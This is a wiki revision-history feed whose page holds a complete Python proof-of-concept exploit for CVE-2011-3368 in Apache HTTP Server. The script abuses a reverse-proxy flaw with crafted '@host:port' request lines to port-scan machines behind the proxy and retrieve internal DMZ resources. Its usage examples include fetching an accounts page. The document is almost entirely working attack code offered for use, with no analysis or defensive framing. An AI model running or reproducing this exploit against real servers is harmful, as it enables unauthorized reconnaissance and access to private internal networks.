https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2011-3368_Apache_HTTP_Server%E6%BC%8F%E6%B4%9E CVE-2011-3368 Apache HTTP Server漏洞 - Revision history 2026-04-17T22:55:58Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CVE-2011-3368_Apache_HTTP_Server%E6%BC%8F%E6%B4%9E&diff=959&oldid=prev Pwnwiki: Created page with "==POC== <pre> #!/usr/bin/env python import socket import string import getopt, sys known_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080] def..." 2021-04-03T06:32:28Z <p>Created page with &quot;==POC== &lt;pre&gt; #!/usr/bin/env python import socket import string import getopt, sys known_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080] def...&quot;</p> <p><b>New page</b></p><div>==POC==<br /> &lt;pre&gt;<br /> #!/usr/bin/env python<br /> <br /> import socket<br /> import string<br /> import getopt, sys<br /> <br /> <br /> known_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080]<br /> <br /> def send_request(url, apache_target, apache_port, internal_target, internal_port, resource):<br /> <br /> get = &quot;GET &quot; + url + &quot;@&quot; + internal_target + &quot;:&quot; + internal_port + &quot;/&quot; + resource + &quot; HTTP/1.1\r\n&quot;<br /> get = get + &quot;Host: &quot; + apache_target + &quot;\r\n\r\n&quot;<br /> <br /> remoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /> remoteserver.settimeout(3)<br /> <br /> try:<br /> remoteserver.connect((apache_target, int(apache_port)))<br /> remoteserver.send(get)<br /> return remoteserver.recv(4096)<br /> except:<br /> return &quot;&quot;<br /> <br /> def get_banner(result):<br /> return result[string.find(result, &quot;\r\n\r\n&quot;)+4:]<br /> <br /> <br /> def scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource):<br /> <br /> print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource)<br /> for port in tested_ports:<br /> port = str(port)<br /> result = send_request(url, apache_target, apache_port, internal_target, port, resource)<br /> if string.find(result,&quot;HTTP/1.1 200&quot;)!=-1 or \<br /> string.find(result,&quot;HTTP/1.1 30&quot;)!=-1 or \<br /> string.find(result,&quot;HTTP/1.1 502&quot;)!=-1:<br /> print &quot;- Open port: &quot; + port + &quot;/TCP&quot;<br /> print get_banner(result)<br /> elif len(result)==0:<br /> print &quot;- Filtered port: &quot; + port + &quot;/TCP&quot;<br /> else:<br /> print &quot;- Closed port: &quot; + port + &quot;/TCP&quot;<br /> <br /> <br /> def usage():<br /> print<br /> print &quot;CVE-2011-3368 proof of concept by Rodrigo Marcos&quot;<br /> print &quot;http://www.secforce.co.uk&quot;<br /> print<br /> print &quot;usage():&quot;<br /> print &quot;python apache_scan.py [options]&quot;<br /> print<br /> print &quot; [options]&quot;<br /> print &quot; -r: Remote Apache host&quot;<br /> print &quot; -p: Remote Apache port (default is 80)&quot;<br /> print &quot; -u: URL on the remote web server (default is /)&quot;<br /> print &quot; -d: Host in the DMZ (default is 127.0.0.1)&quot;<br /> print &quot; -e: Port in the DMZ (enables 'single port scan')&quot;<br /> print &quot; -g: GET request to the host in the DMZ (default is /)&quot;<br /> print &quot; -h: Help page&quot;<br /> print<br /> print &quot;examples:&quot;<br /> print &quot; - Port scan of the remote host&quot;<br /> print &quot; python apache_scan.py -r www.example.com -u /images/test.gif&quot;<br /> print &quot; - Port scan of a host in the DMZ&quot;<br /> print &quot; python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local&quot;<br /> print &quot; - Retrieve a resource from a host in the DMZ&quot;<br /> print &quot; python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html&quot;<br /> print<br /> <br /> def print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource):<br /> print<br /> print &quot;CVE-2011-3368 proof of concept by Rodrigo Marcos&quot;<br /> print &quot;http://www.secforce.com&quot;<br /> print<br /> print &quot; [+] Target: &quot; + apache_target<br /> print &quot; [+] Target port: &quot; + apache_port<br /> print &quot; [+] Internal host: &quot; + internal_target<br /> print &quot; [+] Tested ports: &quot; + str(tested_ports)<br /> print &quot; [+] Internal resource: &quot; + resource<br /> print<br /> <br /> <br /> def main():<br /> <br /> global apache_target<br /> global apache_port<br /> global url<br /> global internal_target<br /> global internal_port<br /> global resource<br /> <br /> try:<br /> opts, args = getopt.getopt(sys.argv[1:], &quot;u:r:p:d:e:g:h&quot;, [&quot;help&quot;])<br /> except getopt.GetoptError:<br /> usage()<br /> sys.exit(2)<br /> <br /> try:<br /> for o, a in opts:<br /> if o in (&quot;-h&quot;, &quot;--help&quot;):<br /> usage()<br /> sys.exit(2)<br /> if o == &quot;-u&quot;:<br /> url=a<br /> if o == &quot;-r&quot;:<br /> apache_target=a<br /> if o == &quot;-p&quot;:<br /> apache_port=a<br /> if o == &quot;-d&quot;:<br /> internal_target = a<br /> if o == &quot;-e&quot;:<br /> internal_port=a<br /> if o == &quot;-g&quot;:<br /> resource=a <br /> <br /> except getopt.GetoptError:<br /> usage()<br /> sys.exit(2)<br /> <br /> if apache_target == &quot;&quot;:<br /> usage()<br /> sys.exit(2)<br /> <br /> <br /> url = &quot;/&quot;<br /> apache_target = &quot;&quot;<br /> apache_port = &quot;80&quot;<br /> internal_target = &quot;127.0.0.1&quot;<br /> internal_port = &quot;&quot;<br /> resource = &quot;/&quot;<br /> <br /> main()<br /> <br /> if internal_port!=&quot;&quot;:<br /> tested_ports = [internal_port]<br /> else:<br /> tested_ports = known_ports<br /> <br /> scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)<br /> &lt;/pre&gt;</div> Pwnwiki